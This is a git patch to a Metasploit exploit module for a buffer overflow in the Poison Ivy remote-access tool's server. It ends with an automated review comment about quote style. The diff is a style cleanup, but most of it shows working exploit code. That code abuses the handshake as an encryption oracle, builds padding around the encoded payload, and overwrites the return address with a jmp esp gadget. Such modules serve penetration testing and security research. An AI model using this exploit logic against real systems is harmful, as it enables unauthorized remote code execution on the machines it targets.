From 88fdc9f1237a5c2e8730e3e7d12387fdbaaffc19 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Wed, 16 Sep 2015 16:14:21 -0500
Subject: [PATCH] Clean exploit method

---
 modules/exploits/windows/misc/poisonivy_bof.rb | 17 ++++++++---------
 1 file changed, 8 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/windows/misc/poisonivy_bof.rb b/modules/exploits/windows/misc/poisonivy_bof.rb
index f52cb16470..e79bd1a7ae 100644
--- a/modules/exploits/windows/misc/poisonivy_bof.rb
+++ b/modules/exploits/windows/misc/poisonivy_bof.rb
@@ -41,8 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'Payload' =>
 {
 'StackAdjustment' => -4000,
- 'Space' => 10000,
- 'BadChars' => "",
+ 'Space' => 10000
 },
 'Platform' => 'win',
 'Targets' =>
@@ -151,29 +150,29 @@ class Metasploit3 < Msf::Exploit::Remote
 print_status("Performing handshake...")
 
 # plaintext header
- plaintextHeader = "\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\xbb\x00\x00\x00\xc2\x00\x00\x00\xc2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+ plaintext_header = "\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\xbb\x00\x00\x00\xc2\x00\x00\x00\xc2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
 # crafted challenge (first 32 bytes is our plaintext header), abuse challenge-response as encryption oracle
- challenge = plaintextHeader + ("\x00" * (256 - 32))
+ challenge = plaintext_header + ("\x00" * (256 - 32))
 sock.put(challenge)
 # response = encrypt(challenge, key)
 response = sock.get_once
 # since encryption is done using Camellia in ECB mode, we can cut and paste the first 32 bytes (our header inside the crafted challenge) without knowing the key
- encryptedHeader = response[0, 32]
+ encrypted_header = response[0, 32]
 # Don't change the nulls, or it might not work
 xploit = ''
- xploit << encryptedHeader
+ xploit << encrypted_header
 xploit << "\x00" * (target['PayloadOffset'] - xploit.length)
 xploit << payload.encoded
 xploit << "\x00" * (target['Offset'] - xploit.length)
- xploit << [target.ret].pack("V") # ret to a jmp esp opcode
- xploit << [target['RWAddress']].pack("V") # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
+ xploit << [target.ret].pack('V') # ret to a jmp esp opcode
+ xploit << [target['RWAddress']].pack('V') # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
 xploit << target['jmpPayload'] # This comes immediately after ret - it is a setup for the payload (jmp back)
 # The disconnection triggers the exploit
- print_status("Sending exploit...")
+ print_status('Sending exploit...')
 sock.put(xploit)
 select(nil,nil,nil,5)
 disconnect
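Review bot: The quote-style cleanup in this hunk is incomplete: `print_status('Sending exploit...')` is switched to single quotes, but `print_status("Performing handshake...")` at the top of the same hunk keeps double quotes, and `select(nil,nil,nil,5)` near the end still has no spaces after its commas. Since the commit's stated purpose is cleaning this method, finishing both in the same change keeps it consistent with the snake_case renames it introduces: `print_status('Performing handshake...')` and `select(nil, nil, nil, 5)`. The `"\x00"` padding literals must stay double-quoted because of the escapes, so leaving those untouched is correct. The enclosing method starts and ends outside the hunk.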